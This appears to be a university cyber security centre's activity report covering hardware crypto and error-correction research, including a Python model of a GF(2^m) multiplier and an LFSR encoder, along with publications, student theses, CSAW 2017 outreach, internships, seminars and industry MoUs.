(1) High Throughput Galois Field (GF) Multipliers - Vector GF(2^m) multipliers are proposed that perform multiple GF(2^{m/2}) or GF(2^{m/4}) multiplications using one GF(2^m) multiplier. Similarly, vector m-bit GF(p) multipliers are proposed that perform multiple m/2-bit or m/4-bit GF(p) multiplications using one m-bit GF(p) multiplier, where m = log2 p. The work also proposes non-vector flexible GF(2^m) and m-bit GF(p) multipliers in which m can be varied from 2 up to the maximum allowable value. The proposed systolic vector parallel GF(2^16) multiplier achieves a 95.8% improvement in throughput over a reconfigurable bit-serial design, using 45nm CMOS technology with Cadence Genus/Innovus 15.20. Figure 15 shows the operation of the proposed systolic parallel versatile non-vector GF(2^4) LSB-first multiplier, in which multiplications in smaller fields such as GF(2^3) can be performed on the GF(2^4) multiplier.

(2) Low Power Asynchronous Crypto Primitives - The GF multipliers, multiplicative inverse, exponentiation, 128-bit AES and affine-coordinate GF(2^163) ECC are designed asynchronously: the hardware is reused over a number of iterations without synchronous registers, using asynchronous completion-detection logic. This reduces power dissipation compared with various existing techniques. For example, the proposed asynchronous GF(2^16) multiplier achieves a 99.6% reduction in switching power compared with a scalable Montgomery-based multiplier, using 45nm CMOS technology with Cadence Genus/Innovus 15.20. Figure 16(d) shows the proposed asynchronous design: the recharge stage uses the FSM to take its inputs either from the input ports or from the previous output, COMBO performs the operation, and CTL (control logic) determines whether the present operation has completed. When it has, the done signal goes high and the FSM takes the output as the input of the next operation.

Figure 15: Operation of the proposed systolic parallel versatile non-vector GF(2^4) LSB-first multiplier

(3) Low Power Network Packet Processing Elements - This work covers hardware optimizations for payload matching, packet classification and backplane switch interconnects through architectural changes to existing designs. Asynchronous Bloom-filter-based payload matching, lookup/decision-tree-based packet classification with clock gating, and a multiplexer-based buffered crossbar backplane are used to achieve low power dissipation. For example, the proposed asynchronous Bloom-filter-based payload matching architecture achieves a 94.9% reduction in power-delay product (PDP) over a Cuckoo-based design, using 45nm CMOS technology with Cadence Genus/Innovus 15.20.

(4) Flexible LFSR based Dividers for BCH and RS Error Correction Encoders - This work proposes LFSR-based serial/parallel flexible and vector divider architectures for BCH and Reed-Solomon (RS) error-correcting codes, and elaborates versatile hardware implementations of BCH- and RS-based turbo product codes (TPCs) using the serial flexible/vector dividers. The flexible architectures perform the division with a variable-length generator polynomial in BCH and RS codes; the vector architectures perform multiple divisions in parallel to improve throughput. Synthesis results using 45nm CMOS technology show significant improvement over existing designs: for example, the proposed LFSR-based serial vector dividers achieve 47.1% and 83.3% improvements in throughput over the conventional designs for a BCH encoder with a generator polynomial of length 65 and an RS encoder with a generator polynomial of length 17 respectively, with Cadence Genus/Innovus 15.20.
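Software models, as an added example and not the VLSI designs themselves, of the two bit-serial datapaths in items (1) and (4): an LSB-first GF(2^m) multiplier whose field size m is a run-time parameter, and an LFSR divider that produces the parity of a systematic BCH/RS-style code word for a generator polynomial of any length. Each loop iteration stands for one clock cycle of the hardware. The field polynomials and the (7,4) generator used in the checks are standard textbook choices, not taken from the report.

```python
"""Software models of two bit-serial datapaths: an LSB-first GF(2^m) multiplier
with a run-time field size m, and an LFSR divider that computes the parity of a
systematic BCH/RS-style code word. Added example, not the VLSI designs; each
loop iteration stands for one clock cycle of the hardware."""


def gf2m_mul_lsb_first(a: int, b: int, poly: int, m: int) -> int:
    """Return a*b in GF(2^m) defined by the degree-m polynomial `poly` (bit m set).
    LSB-first: cycle i adds a*x^i to the accumulator if b_i = 1, then the running
    multiplicand is multiplied by x with a single reduction step. Changing m and
    poly re-targets the same datapath to another field, which is the 'flexible'
    property of item (1)."""
    if a >> m or b >> m or not (poly >> m) & 1:
        raise ValueError("operands must be < 2^m and poly must have degree m")
    acc = 0
    for i in range(m):
        if (b >> i) & 1:
            acc ^= a
        a <<= 1                       # a := a * x
        if (a >> m) & 1:              # one conditional subtraction of the field polynomial
            a ^= poly
    return acc


def gf2m_mul_reference(a: int, b: int, poly: int, m: int) -> int:
    """Schoolbook multiply then long division; used to cross-check the serial model."""
    prod = 0
    for i in range(m):
        if (b >> i) & 1:
            prod ^= a << i
    for deg in range(2 * m - 2, m - 1, -1):
        if (prod >> deg) & 1:
            prod ^= poly << (deg - m)
    return prod


def lfsr_remainder(bits, generator):
    """Divide m(x)*x^r by g(x) with a length-r LFSR, r = deg g. `bits` and
    `generator` are coefficient lists, most significant first; g needs g_r = g_0 = 1.
    Returns the remainder, most significant first: the parity of the systematic
    code word m(x)*x^r + rem(x). The register length follows len(generator), so
    the same routine serves any generator length, as the flexible divider of item (4) does."""
    r = len(generator) - 1
    g = generator[::-1]                      # g[i] = coefficient of x^i
    reg = [0] * r                            # reg[i] holds the coefficient of x^i
    for bit in bits:                         # one message coefficient per clock
        feedback = bit ^ reg[r - 1]
        for i in range(r - 1, 0, -1):
            reg[i] = reg[i - 1] ^ (g[i] & feedback)
        reg[0] = feedback
    return reg[::-1]


def systematic_encode(message, generator):
    """Code word = message followed by the LFSR parity bits."""
    return list(message) + lfsr_remainder(message, generator)


if __name__ == "__main__":
    print(hex(gf2m_mul_lsb_first(0x57, 0x83, 0x11B, 8)))        # AES field, FIPS-197 example
    print(systematic_encode([1, 0, 0, 0], [1, 0, 1, 1]))         # (7,4) code, g = x^3 + x + 1
```

gf2m_mul_reference is the schoolbook multiply-then-reduce used to cross-check the serial model over the whole GF(2^4) multiplication table. Feeding a complete code word back into lfsr_remainder yields zero, since x^r is invertible modulo any g with g(0) = 1, which is the check a decoder's syndrome stage performs.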

(5) Efficient Hardware-Software Codesigns of AES Encryptor and RS-BCH Encoder - This work proposes hardware-software codesigns for an AES encryptor and an RS-BCH concatenated encoder whose latency and hardware cost lie between those of fully hardware and fully software designs. The proposed folded AES codesign uses no synchronous registers. In the proposed RS-BCH concatenated encoder the design is partitioned in two, with the less intensive task in software and the computationally heavy task in hardware. Synthesis results show that the proposed codesigns of 128-bit AES and of the RS(255,239)-BCH(2184,2040) serially concatenated error-correction encoder achieve 85% and 40% reductions in switching power dissipation over a conventional folded 128-bit AES design and a fully hardware RS-BCH concatenated encoder respectively, on an Artix-7 FPGA. Figure 18 shows the block diagram of the AES/RS-BCH co-processor connected to a 32-bit MicroBlaze using Xilinx Vivado.


Figure 18: Block diagram of the AES/RS-BCH co-processor connected with 32-bit Microblaze using Xilinx Vivado

Tools/Equipment Used:

(1) Artix-7 Nexys-4 FPGA (XC7A100T-CSG324) evaluation board with Xilinx Vivado
(2) Cadence Genus/Innovus 15.20 with a 45nm CMOS technology library (gsclib045, fast_vdd1v0_basicCells.lib)

Figure 16: (a) The circuit with synchronous pipeline, (b) Asynchronous pipeline with glitches due to delay imbalance in the forward path, (c) Existing asynchronous pipeline without glitches (absence of delay imbalance in the forward path), (d) Proposed glitch f

PUBLICATIONS – CONFERENCES/JOURNALS

1. Mohamed Asan Basiri M and Sandeep K. Shukla, "Efficient Hardware-Software Codesigns of AES Encryptor and RS-BCH Encoder", International Symposium on VLSI Design and Test (VDAT), 2018 (accepted for oral presentation).
2. J. G. Sreenath, S. Mangalwedekar, A. Meghwani, S. Chakrabarti, K. Rajawat and S. C. Srivastava, "Impact of GPS Spoofing on Synchrophasor Assisted Load Shedding", IEEE PES General Meeting, Portland, Oregon, Aug 5-9, 2018 (accepted).
3. Rajendra Kumar, Mahesh Sreekumar Rajasree and Hoda AlKhzaim, "Cryptanalysis of 1-Round KECCAK", AFRICACRYPT 2018, Springer International Publishing AG, part of Springer Nature, 2018.
4. Mohamed Asan Basiri M and Sandeep K. Shukla, "Flexible Composite Galois Field GF((2^m)^2) Multiplier Designs", International Symposium on VLSI Design and Test (VDAT), Communications in Computer and Information Science, Springer, vol. 711, pp. 3-14, June 2017, India.
5. Mohamed Asan Basiri M and Sandeep K. Shukla, "Low Power Hardware Implementations for Network Packet Processing Elements", Integration, the VLSI Journal, vol. 62, pp. 170-181, June 2018.
6. Debleena Das, Ansuman Banerjee and Sandeep K. Shukla, "An automata theoretic framework for detecting schedulability attacks on cyber-physical systems", EAIT 2018: Fifth International Conference on Emerging Applications of Information Technology, 2018.
7. Shubham Sharma, Rahul Gupta, Shubham Sahai Srivastava and Sandeep K. Shukla, "Detecting Insider Attacks on Databases using Blockchains", ACM SIGSAC Conference on Computer and Communications Security, 2017.
8. S. Venkatesan, Shubham Sahai Srivastava and Sandeep Kumar Shukla, "Decentralized Authentication of IoT devices using Blockchain", 2nd Advanced Workshop on Blockchain: Technology, Applications, Challenges, IIT Bombay, 2017.
9. Mohamed Asan Basiri M and Sandeep K. Shukla, "Flexible VLSI Architectures for Galois Field Multipliers", Integration, the VLSI Journal, vol. 59, pp. 109-124, 2017.
10. Prachi Joshi, S. S. Ravi, Soheil Samii, Unmesh Bordoloi, Sandeep Shukla and Haibo Zeng, "Offset Assignment to Signals for Improving Frame Packing in CAN-FD", IEEE Real-Time Systems Symposium (RTSS 2017), Paris, France, December 2017 (accepted).
11. Rourab Paul and Sandeep Kumar Shukla, "A High Speed KECCAK Coprocessor for Partitioned NSP Architecture on FPGA Platform", VDAT 2017: 21st International Symposium on VLSI Design and Test, 2017.
12. Sandeep K. Shukla, "Editorial: Distributed Public Ledgers and Block Chains—What Good Are They for Embedded Systems?", ACM Transactions on Embedded Computing Systems (TECS), 2017.

TECHNICAL REPORTS

1. Detecting Insider Attacks on Databases using Blockchains. Shubham Sharma, Rahul Gupta, Shubham Sahai Srivastava and Sandeep K. Shukla.
2. Flexible VLSI Architectures for Galois Field Multipliers. Mohamed Asan Basiri M and Sandeep K. Shukla.
3. Hardware Optimizations for Crypto Implementations. Mohamed Asan Basiri M and Sandeep K. Shukla.
4. Flexible Composite Galois Field GF((2^m)^2) Multiplier Designs. Mohamed Asan Basiri M and Sandeep K. Shukla.
5. A High Speed KECCAK Coprocessor for Partitioned NSP Architecture on FPGA Platform. Rourab Paul and Sandeep K. Shukla.
6. A SCADA Test Bed for Cyber Security Education & Research. Rohit Negi, Abhay Kumar, Saurabh Kumar, Sandeep K. Shukla and Avik Dayal.


HUMAN RESOURCE DEVELOPMENT

PhD Theses (ongoing)

Student Name                  Thesis Topic
Abhay Kumar                   Cyber Security of Software Defined Networks
Saurabh Kumar                 A Framework for Sandboxing and Dynamical Analysis for Android Malware
Shubham Sahai Srivastava      Formal Analysis and Verification of Security Protocols and Blockchain Protocols
Rajendra Kumar                Hardness of Lattice Problems
Mahesh Sreekumar Rajasree     Algorithms for Lattice Problems and Lattice-based Cryptography
Gufran Siddique               Mobile Agents based Cyber Defense Immune System

M.S. Theses (ongoing)

Student Name                  Thesis Topic
Rohit Negi                    SCADA Security, SCADA Test Bed Design and Vulnerability/Threat Intelligence
Aneet Dutta                   Intrusion Detection in Cyber Physical Systems with Anomaly Detection

M.Tech Theses (completed)

Student Name                  Thesis Topic
Amit Kumar                    PeerClear: Peer-to-Peer Botnet Detection
Shubham Singh                 Cloud Based IoT Honeypot for MQTT Protocol
Anmol Kumar Shrivastava       Linux Malware Detection by Hybrid Analysis
Gaurav Kumar                  Automatic Malware Detection using Memory Forensics
Mugdha Gupta                  Early Stage Malware Classification using Behavior Analysis
Vineet Purswani               Clustering for Hybrid Malware Analysis and Multi-path Execution
Ajay Singh                    Malware Classification using Image Representation
Pranjul Ahuja                 Robust Malware Detection using Integrated Static and Dynamic Analysis
Saptarshi Gan                 An IoT Simulator in NS3 and a Key-based Authentication Architecture for IoT Devices using Blockchain
Rohit Sehgal                  Tracing Cyber Threats with Honey-systems
Nishit Majithia               Honey-System: Design, Implementation & Attack Analysis
Krishnaprasad P               Capturing Attacks on IoT Devices with a Multi-purpose IoT Honeypot

UGP Projects (completed)

Student Name                  Project Topic
Prakhar Agrawal               Exploiting the Media Projection Vulnerability in Android 7 and below
Nilesh Vasita                 Verifiable Billing in Electric Vehicle Charging Infrastructure using Blockchain
Arham Chopra                  Lightweight Security in SCADA Systems
Dhruv Kumar                   Secure Authentication in Content Management Systems (CMS)
Saksham Sharma                Study and Implementation in Haskell
Shikhar Mahajan               Enegiota: A Scalable and Feeless Billing DApp on Tangle

OUTREACH TO RAISE AWARENESS ABOUT CYBER SECURITY

CSAW 2017

Cyber Security Awareness Week (CSAW), was successfully introduced to India in

2016 by IIT Kanpur, Dept. of CSE in partnership with NYU, Tandon School of

Engineering, its second edition commenced in 2017 (9th -11th November). The

event was co-hosted at four locations i.e. North America, Europe, India and

Middle-east.


In its second year, the cyber security competition expanded significantly, as is evident from the increased participation and performance of the students, raising the total number of participants for the CSAW finals from 44 in 2016 to 64 in 2017. To expand its outreach, a new Professional team category was introduced this year under Capture the Flag, a 36-hour around-the-clock software hacking contest.

The three-day event witnessed participation of over 52 students and research scholars and 12 professionals on a pan-India basis. Of these, a total of 14 teams (10 teams in the student category and 4 teams in the professional category) from India participated in Capture the Flag, 2 teams from IIT Kharagpur and IIT Madras in the Embedded Security Challenge, 1 team from BHU Law School in the Law & Policy Competition, and 8 paper presentations were made in the Applied Research Competition.

On day one of CSAW'17 a series of invited talks was arranged, serving as a knowledge exchange platform that benefitted the students. The invited speakers represented academia (Indian Statistical Institute, Kolkata; IIT Kharagpur), industry (Nivetti Systems), entrepreneurs/start-ups (Gratia Technology) and professional hackers (bug bounty hunters) working in the cyber security arena.

Among the multiple competitions hosted at CSAW, Capture the Flag (CTF) is the flagship event, inviting hackers to compete and showcase their skills globally. CTF finalists included participants from BITS Pilani, Amrita University Amritapuri, IIIT Allahabad, NIT Kurukshetra, IIT Roorkee, IIIT Delhi and IIT Indore. Based on performance, their global ranking was remarkable: in the student category, the winning team 'InfosecIITR' (IIT Roorkee) stood 10th in the world ranking, while the first runner-up team 'Pirates from the Kernel' (IIT Indore) and the second runner-up team 'D4rkcode' (IIIT Delhi) stood 16th and 19th in the world ranking, respectively.

In the professional category, the winning team 'pwnpeiii' stood 14th in the world ranking, while the runner-up team 'Bytebandits' stood at the 15th position.

The Embedded Security Challenge is a hardware hacking challenge in which participants were required to hack into a target system designed by NYU Tandon. In India, the finalist teams were from IIT Madras and IIT Kharagpur. They competed with each other through PowerPoint presentations followed by poster presentations. IIT Madras won over IIT Kharagpur in this challenge.

The Applied Research Competition primarily encourages young researchers to present their papers along with posters. This competition received 14 paper submissions from various institutes, e.g., IIT Indore, IIT Kharagpur, IIIT Delhi and IIT Madras. Of these 14 papers, 8 were shortlisted and invited for 20-minute presentations. The first position was secured by a team from IIT Kharagpur, while the second and third positions went to teams from IIT Madras and IIT Kharagpur respectively.

A team from Law School, BHU participated in the Law & Policy competition, in which participants must develop a policy paper on a given prompt. This year's prompt, given by IIT Kanpur, was: "Policy interventions to solve fake news endemic".

These competitions were judged by cyber security experts from IIT Kharagpur, IIT Ropar, VECC Kolkata, industry (Nivetti Systems), CDAC-Mohali and IIT Kanpur, except the CTF, which was played online on a global CTF platform. CSAW brings the C3I centre of the Computer Science department, IIT Kanpur on par with the Cyber Security centre at NYU in terms of outreach for creating awareness on cyber security.


CSAW'18 is scheduled to be held on 8-11 November 2018 simultaneously at four international locations. This year, CSAW will launch a new integrated website for all the regional partners. This site will act as a single source of information for the worldwide participants and audience, bringing all the regional partners together transparently. September 14-16, 2018 are the dates finalized for the CTF prelims round; registration for it will open in a day or two.

This year, with the hope of expansion, CSAW-India plans to modify the Embedded Security Challenge competition and bring it onto more of a CTF platform so as to reach dedicated hardware security personnel. Under the Applied Research Competition, this year's aim is to set up a scrutinizing committee comprising academicians and professionals, for a fairer contest and the engagement of experts. Industry/C3I partners will also be approached to set up an industry fair and to address students and participants. With the number of CSAW-India Facebook page followers reaching 423, we expect more countrywide participation of cyber security students and professionals in enhancing their skills through this platform.

SUMMER INTERNSHIP PROGRAM

Year: 2017

Student Name | College/University | Topic

Subhasis Mukhopadhyay | West Bengal University of Technology | Attacks in Android

Akshat Aggarwal | Indian Institute of Information Technology, Allahabad | Cyber Threat Intelligence Analysis

Mazhar Imam Khan | Indian Institute of Engineering Science & Technology, Shibpur | Telpot - Capturing Cyber Attacks with generic Telnet Based Honeypot

Aditya Srivastava | University of Petroleum & Energy Studies | Detection of Cyber Attacks In Industrial Control Systems Using Neural Networks

Sagar Sharma | KNIT, Sultanpur | Application Vulnerabilities, Issues and Mitigation


Shubham Pandey | Lucknow University | Malware Analysis

Shobhit Rastogi | IIT Kanpur | SMTP by Public Key Cryptography

Dipanwita Mukherjee | West Bengal State University | A browser add-on for Alerting users against Phishing Site Accesses

Jayadeep Reddy Ganta | National Institute of Technology, Tiruchirapalli | Implementation of ZUC Algorithm on FPGA

Utsava Verma | Manipal Institute of Technology, Manipal | Malware Analysis with Machine Learning

Ashish Gahlot | Govt. Engineering College, Ajmer | Vulnerability Assessment of Industrial Control System

Amodini Vardhan | Manipal Institute of Technology, Karnataka | Design and Implementation of a Web-based Scalable, Secure and attributional grade management system

Mugdha Jadhao | IIT Roorkee | Designing coprocessor for implementing crypto-algorithm 'Snow3g'

Mohit Sharma | Ashoka University | Malware Analysis with Machine Learning

Year: 2018

Student Name | College/University

Shyam Sunder Tiwari | Institute of Engineering and Technology, Lucknow

Shankhadip Mallick | University of Engineering & Management, Jaipur

R. Akashraj | MIT, Manipal

Akhil P | Cochin University of Science and Technology, Kerala

Saubhagya Srivastava | University of Petroleum & Energy Studies

Gowtham Chitipolu | IIT Gandhinagar

Chamandeep Singh | NIT Tiruchirappalli

Shivanshu Singh | IIT Kanpur

Raghul M | Amrita University

Ashwin Sekhari | National Institute of Technology, Rourkela

Satish Sripadam | National Institute Of Technology, Tiruchirappalli

Rishav Chatterjee | KIIT University

Mohammed Israil | Gandhi Engineering College, Odisha


AKTU Interns 2018

Student Name | Topic

Pratishtha Saxena | Deep Packet Inspection (DPI) in Network

Parul Gahelot | Deep Packet Inspection (DPI) in Network

Monika | Detection of loopholes in web application

Anam Fatima | Android app for detection of malicious Apps on the device

Areeba Irshad | Classification of malware analysis and preventing the attacks

Ankita | Detection of Malware in Advance Android Apps By using the Static Analysis

Kumar Shanu Singh | Cloud based IoT Honeypot

Shikha | Malware analysis, Security monitoring tool

Vishal Choudhary | A Runtime analysis to detect malware

Arvind Goutam | Practice various webapp based attacks and detect the vulnerability

Nitesh Kumar | A hybrid approach to detect advanced malware at large scale

SEMINARS

Seminars by the Center Faculty:

1. Prof. Sandeep Shukla is an invited speaker on "Blockchain for E-Governance" at the Workshop on Blockchain at the Indian Statistical Institute Kolkata in November 2018.

2. Prof. Sandeep Shukla is an invited speaker on "Cyber Security of Digital Financial System" at RBI Lucknow for their cyber security awareness campaign week in October 2018.

3. Prof. Sandeep Shukla was an inaugural speaker at the launch of the ACM student chapter at the Indian Institute of Information Technology, Allahabad, in Feb 2018.

4. Prof. Sandeep Shukla was an invited speaker and panel moderator at the 2nd Cyber Security Conference organized in Hyderabad in December 2017.


5. Prof. Sandeep K. Shukla was a keynote speaker at the International Forum on Design Languages (FDL 2017) on "Do Design and Specification Languages have any role to Play in Cyber Security?", held in Verona, Italy during September 18-20, 2017.

6. Prof. Sandeep K. Shukla was an invited speaker at the Cyber Security Week organized by the Blavatnik Interdisciplinary Center for Cyber Security at Tel Aviv, Israel on June 28, 2017, on an academic perspective of cyber security.

7. Prof. Sandeep Shukla was a keynote speaker at the 23rd IEEE International Conference on Embedded and Real-Time Computing Systems and Applications (RTCSA'17) on "Cyber Security of Cyber Physical Critical Infrastructures: A Case for a Schizoid Design Approach", held during August 16-18, 2017 in Taiwan.

8. Prof. Sandeep K. Shukla was an invited speaker at the inauguration of the RBI Kanpur Information Security Awareness Campaign, May 2017.

9. Prof. Sandeep K. Shukla was invited to membership in the subgroup on mobile banking & security and the subgroup on card based payments & security formed by the Reserve Bank of India's standing committee on Cyber Security.

10. Prof. Sandeep K. Shukla delivered an invited talk on "How Safe are our Critical Infrastructures from Cyber Attacks" at IIIT Delhi on 11th Feb 2017.

Seminars and Events Organized at the Center

Topic | Speaker's Name | Date

Walking the edge between structure and randomness: New constructions for Obfuscation and Functional Encryption | Prof. Shweta Agrawal, IIT Madras | Thu, 05/10/2018


Smart Living: The Next Frontier | Prof. Sajal K. Das, IEEE Fellow, Daniel St. Clair Endowed Chair, Missouri University of Science and Technology, USA | Fri, 01/12/2018

Planar Graph Perfect Matching is in NC | Vijay V. Vazirani, University of California, Irvine | Wed, 01/03/2018

Taming Timing Uncertainties for New Generation of Cyber-Physical Systems and Applications | Rajesh K. Gupta, UCSD | Fri, 12/29/2017

Towards Secure and Privacy-aware Cyber-Physical Systems and IoT | Mani Srivastava, UCLA | Fri, 12/29/2017

Introduction to Biochip Security | Ramesh Karri (New York University, New York) | Tue, 08/22/2017

Cyber-Security: Analog Side Channels of Embedded Cyber-Physical Systems | Farshad Khorrami (New York University, New York) | Tue, 08/22/2017

Cryptanalysis of Selected Symmetric Ciphers: Lightweight Choices for Secure Hardware | Hoda A. Alkhzaimi, New York University Abu Dhabi | Tue, 08/22/2017

Do You Trust Your Chip? | Ozgur Sinanoglu (New York University at Abu Dhabi) | Tue, 08/22/2017

Invited Talk by Sujoy Sinha Roy | Sujoy Sinha Roy | Fri, 07/07/2017

MEMORANDUM OF UNDERSTANDING

Academic MOUs

IIT Kanpur, Gujarat State Forensic University and New York University have entered into a tri-partite MoU to collaborate on Cyber Forensics, Cyber Threat Intelligence, developing MOOC courses, etc.


The IITK Center for Cybersecurity for Critical Infrastructure (IITK-CCS), the NYU Tandon School of Engineering Center for Cyber Security (NYU-CCS) and the Gujarat Forensic Sciences University (Institute of Forensic Science and Institute of R&D) have missions with a lot in common. In order to better fulfill their respective missions, representatives from the institutes have exchanged views on establishing relationships and a program of cooperation among the Institutes.

The major objectives of collaborative activities in the academic areas of mutual interest, on a basis of equality and reciprocity, are:

i. Student and Faculty Exchanges among the Institutes;

ii. Creating joint MOOC courses together;

iii. Going for government and industrial funding together in the areas as mentioned in

iv. Explore possibility of joint degree programs in the future;

v. Developing Intellectual Property together.

Industry MOUs

C3I center signed an MoU with InfoSec Ventures, an India-based company focused on cyber security solutions, to cooperate on "crowd-sourcing" based information security techniques to enhance the resilience of the human layer in cyber and information security, automation of digital resilience techniques, and current/future challenges. More information on InfoSec Ventures can be found at https://www.zaubacorp.com/company/INFOSEC-VENTURES-PRIVATE-LIMITED/U74140DL2011PTC219378.

TCG MOU

IIT Kanpur and TCG Digital, a pioneer in setting up the first commercially available cyber range in India, have signed an MoU to jointly offer hands-on technical training and consultancy services in the cyber security domain. These services are primarily based on a state-of-the-art Cyber Range capable of modeling hyper-real cyber-attacks and complex networked environments to serve security agencies, defense establishments, government departments and enterprises in the public and private sectors. The Cyber Range offers a pragmatic and sustainable strategy for arming organizations to assess, educate and certify a national force of Cyber Warriors to carry out information assurance (IA), information operations (IO) and mission assurance (MA) duties. The services would help train the people, validate processes and optimize the technology solutions deployed, and thus reorient the People, Process and Technology triad for real-world cyber security scenarios by allowing them to "train as they fight". Under the MoU signed between the Computer Science Department of IIT Kanpur and TCG Digital Solutions Pvt Ltd, high-end customized technical training, consultancy projects, seminars and workshops would be offered to help an organization's security and IT staff sharpen their skills and gain the experience necessary to combat modern cyber threats.

